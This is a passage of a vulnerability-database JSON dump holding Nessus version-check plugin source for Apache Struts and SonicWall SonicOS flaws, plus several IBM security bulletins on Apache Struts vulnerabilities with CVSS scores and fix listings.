remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:53:10", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:01:31", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-16T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:23:09", "description": "According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected by a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-10-16T00:00:00", "type": "nessus", "title": "SonicWall SonicOS Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:sonicwall:sonicos"], "id": "SONICWALL_SNWLID-2020-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/141474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141474);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-5135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0127\");\n\n script_name(english:\"SonicWall SonicOS Buffer Overflow Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a Buffer Overflow vulnerability, leading to Denial of Service, \nand potentially to Arbitrary Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote SonicWall firewall is running a version of SonicOS that is affected\nby a buffer overflow vulnerability, allowing a remote attacker to cause Denial of Service (DoS), \nand potentially execute arbitrary code by sending a malicious request to the firewall. \nThis vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v \nand Gen 7 version 7.0.0.0.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c667b9f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sonicwall:sonicos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\");\n script_require_keys(\"Host/OS\");\n\n exit(0);\n}\n\nos = get_kb_item_or_exit(\"Host/OS\");\nif (os !~ \"^SonicOS\" ) audit(AUDIT_OS_NOT, \"SonicWall SonicOS\");\n\n# SonicOS Enhanced 6.0.5.3-94o on a SonicWALL NSA 220\nmatch = pregmatch(pattern:\"^SonicOS(?: Enhanced)? (([0-9.]+)(-[^ ]*)?) on a SonicWALL\", string:os);\nif (isnull(match)) exit(1, \"Failed to identify the version of SonicOS.\");\nversion = match[1];\n\nfix = NULL;\n\n\nif (version =~ \"^6\\.\")\n{\n # SonicOS 6.0.5.3-93o and earlier\n # fixex in SonicOS 6.0.5.3-94o\n if (version =~ \"^6\\.0\\.5\\.3-([0-8]?[0-9]|9[0-3])o\")\n fix = \"6.0.5.3-94o\"; \n # SonicOS 6.5.1.11-4n and earlier\n # fixed in SonicOS 6.5.1.12-1n\n else if (version =~ \"^6\\.5\\.1\\.11-\\d+n\")\n fix = \"SonicOS 6.5.1.12-1n\";\n # SonicOS 6.5.4.7-79n and earlier\n # fixed in SonicOS 6.5.4.7-83n\n else if (version =~ \"^6\\.5\\.4\\.7-[0-7]?[0-9]n\")\n fix = \"6.5.4.7-83n\";\n # SonicOSv 6.5.4.4-44v-21-794 and earlier\n # fixed in SonicOS 6.5.4.v-21s-987\n # XXX not sure how I can check for this version,\n # as version and fix formats look different\n #else if (version =~ \"^6\\.5\\.4\\.4\")\n # fix = \"6.5.4.v-21s-987\";\n}\n# SonicOS 7.0.0.0-1\n# fixed in 7.0.0.0-2\nelse if (version =~ \"^7\\.0\\.0\\.0-[01]$\")\n{\n fix = \"7.0.0.0-2\";\n}\n\nif (isnull(fix))\n audit(AUDIT_DEVICE_NOT_VULN, \"SonicWALL \", \"SonicOS \" + version);\n#if (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\nelse\n{\n port = 0;\n report =\n '\\n Installed SonicOS version : ' + version +\n '\\n Fixed SonicOS version : ' + fix +\n '\\n';\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ 